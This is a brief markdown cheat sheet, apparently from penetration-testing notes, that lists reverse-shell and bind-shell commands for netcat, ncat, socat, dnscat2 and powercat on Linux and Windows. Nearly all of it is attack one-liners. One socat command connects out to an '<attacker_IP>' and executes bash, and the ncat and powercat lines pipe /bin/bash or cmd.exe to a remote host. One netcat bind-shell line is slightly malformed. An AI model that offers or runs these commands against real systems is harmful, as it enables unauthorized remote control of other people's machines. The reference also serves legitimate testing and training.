# Shell Handler

## 01 - General

### 1.1 - Netcat

#### 1.1.1 - Reverse shell

- Any listening ports ranging between **1-1023** must be ran as root

`$ nc -lnvp 1024`

`$ sudo nc -lnvp 80`

#### 1.1.2 - Bind shell

`$ nc -lnvp <target_IP> <PORT>`

### 1.2 - Ncat

##### 1.2.1 - TCP Method

`$ ncat <IP> <PORT> -e /bin/bash`

##### 1.2.2 - UDP Method

`$ ncat -u <IP> <PORT> -e /bin/bash`

### 1.3 - Socat

#### 1.3.1 - Reverse Shell

- Shell handler (attacker)

`$ socat tcp-listen:<PORT>,reuseaddr,fork file:`tty`,raw,echo=0`

- Connect to attacker

`$ socat tcp:<attacker_IP>:<PORT> exec:bash,pty,stderr,setsid,sigint,sane`

#### 1.3.2 - Bind Shell

- Shell handler (target)

```
$ socat tcp-listen:<PORT>,reuseaddr,fork exec:bash,pty,stderr,setsid,sigint,sane

$ socat file:`tty`,raw,echo=0 tcp:<target_IP>:<PORT>
```

### 1.4 - DNScat

TODO: Provide a usage example with dnscat

`$ ./dnscat2.rb`

## 02 - Windows

### 2.1 - Powercat

#### 2.1.1 - Reverse shell

##### 2.1.1.1 - TCP Method

`PS C:\> powercat -c <IP> -p <PORT> -e cmd.exe`

##### 2.1.1.2 - UDP Method

`PS C:\> powercat -u -c <IP> -p <PORT> -e cmd.exe`

#### 2.1.2 - Bind shell

##### 2.1.2.1 - TCP Method

`PS C:\> powercat -l -p <PORT> -e cmd.exe`

##### 2.1.2.2 - UDP Method

`PS C:\> powercat -u -l -p <PORT> -e cmd.exe`

## References

- [DNScat](https://github.com/iagox86/dnscat2)

- [Powercat](https://github.com/besimorhino/powercat)